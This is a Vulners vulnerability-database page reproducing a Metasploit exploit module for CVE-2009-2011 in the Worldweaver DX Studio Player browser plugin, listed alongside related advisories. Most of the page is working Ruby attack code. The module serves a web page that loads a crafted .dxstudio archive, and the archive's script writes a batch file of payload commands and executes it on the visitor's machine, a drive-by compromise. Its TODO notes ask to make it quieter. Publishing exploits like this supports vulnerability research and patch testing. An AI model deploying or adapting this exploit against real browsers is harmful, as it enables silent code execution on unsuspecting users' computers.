Vulners
Lucene search
Worldweaver DX Studio Player 3.0.29 - 'shell.execute()' Command Execution (Metasploit)
| Reporter | Title | Published | Views | Family All 18 |
|---|---|---|---|---|
 | DX Studio Player < 3.0.29.1 Firefox plug-in Command Injection Vuln | 10 Jun 200900:00 | – | zdt |
 | CVE-2009-2011 | 10 Jun 200900:00 | – | circl |
 | DX Studio Player Firefox plug-in command injection | 9 Jun 200900:00 | – | coresecurity |
 | CVE-2009-2011 | 16 Jun 200920:26 | – | cve |
 | CVE-2009-2011 | 16 Jun 200920:26 | – | cvelist |
 | Worldweaver DX Studio Player < 3.0.29.1 Firefox plugin - Command Injection | 10 Jun 200900:00 | – | exploitdb |
 | Worldweaver DX Studio Player 3.0.29.1 Firefox plugin - Command Injection | 10 Jun 200900:00 | – | exploitpack |
 | Worldweaver DX Studio Player shell.execute() Command Execution | 17 Feb 201020:14 | – | metasploit |
 | CVE-2009-2011 | 16 Jun 200921:00 | – | nvd |
 | Ubuntu USN-785-1 (ipsec-tools) | 15 Jun 200900:00 | – | openvas |
10
##
# $Id: dxstudio_player_exec.rb 9375 2010-05-26 22:39:56Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'rex/zip'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::CmdStagerVBS
def initialize(info = {})
super(update_info(info,
'Name' => 'Worldweaver DX Studio Player <= 3.0.29 shell.execute() Command Execution',
'Description' => %q{
This module exploits a command execution vulnerability within the
DX Studio Player from Worldweaver. The player is a browser plugin for
IE (ActiveX) and Firefox (dll). When an unsuspecting user visits a web
page referring to a specially crafted .dxstudio document, an attacker can
execute arbitrary commands.
Testing was conducted using plugin version 3.0.29.0 for Firefox 2.0.0.20 and
IE 6 on Windows XP SP3. In IE, the user will be prompted if they wish to allow
the plug-in to access local files. This prompt appears to occur only once per
server host.
NOTE: This exploit uses additionally dangerous script features to write to
local files!
},
'License' => MSF_LICENSE,
'Author' => [ 'jduck' ],
'Version' => '$Revision: 9375 $',
'References' =>
[
[ 'CVE', '2009-2011' ],
[ 'BID', '35273' ],
[ 'OSVDB', '54969' ],
[ 'URL', 'http://www.exploit-db.com/exploits/8922' ],
[ 'URL', 'http://dxstudio.com/guide.aspx' ]
],
'Payload' =>
{
'Space' => 2048,
},
'Platform' => 'win',
# 'Arch' => ARCH_CMD,
'Targets' =>
[
[ 'Automatic', { } ],
],
'DisclosureDate' => 'Jun 09 2009',
'DefaultTarget' => 0))
end
def on_request_uri(cli, request)
url_base = "http://"
url_base += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
url_base += ":" + datastore['SRVPORT'] + get_resource()
payload_url = url_base + "/payload"
# handle request for the payload
if (request.uri.match(/payload/))
# build the payload
return if ((p = regenerate_payload(cli)) == nil)
cmds = generate_cmdstager({:linemax => 2047}, p)
scr = ""
cmds.each { |ln|
scr << "f.writeString('"
scr << ln
scr << "\\n');\n"
}
# make header.xml
hdrxml = %Q|<?xml version="1.0"?>
<dxstudio>
<script><![CDATA[function onInit()
{
var f=system.file.openWrite("BATNAME");
f.writeString('@echo off\\n');
CMDS
f.close();
shell.execute("BATNAME");
}]]>
</script>
</dxstudio>
|
hdrxml.gsub!(/CMDS/, scr);
bat_name = rand_text_alphanumeric(rand(32)) + ".bat"
hdrxml.gsub!(/BATNAME/, bat_name);
# craft the zip archive
zip = Rex::Zip::Archive.new
zip.add_file("header.xml", hdrxml)
data = zip.pack
print_status("Sending file.dxstudio payload to #{cli.peerhost}:#{cli.peerport}...")
send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
# Handle the payload
# handler(cli)
return
end
# otherwise, send the html..
html = %Q|<html>
<body>
<div height=100%>
Please wait...
</div>
<object width=1 height=1 classid='clsid:0AC2706C-8623-46F8-9EDD-8F71A897FDAE'>
<param name="src" value="DXURL" />
<embed width=1 height=1 src=DXURL type="application/x-dxstudio">
</embed>
</object>
</body>
</html>
|
print_status("Sending #{self.name} HTML to #{cli.peerhost}:#{cli.peerport}...")
# Transmit the compressed response to the client
html.gsub!(/DXURL/, payload_url)
send_response(cli, html, { 'Content-Type' => 'text/html' })
end
end
=begin
TODO:
- make it more quiet
- auto-migrate?
=endData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
26 May 2010 00:00Current
6.6Medium risk
Vulners AI Score6.6
CVSS 29.3
EPSS0.76777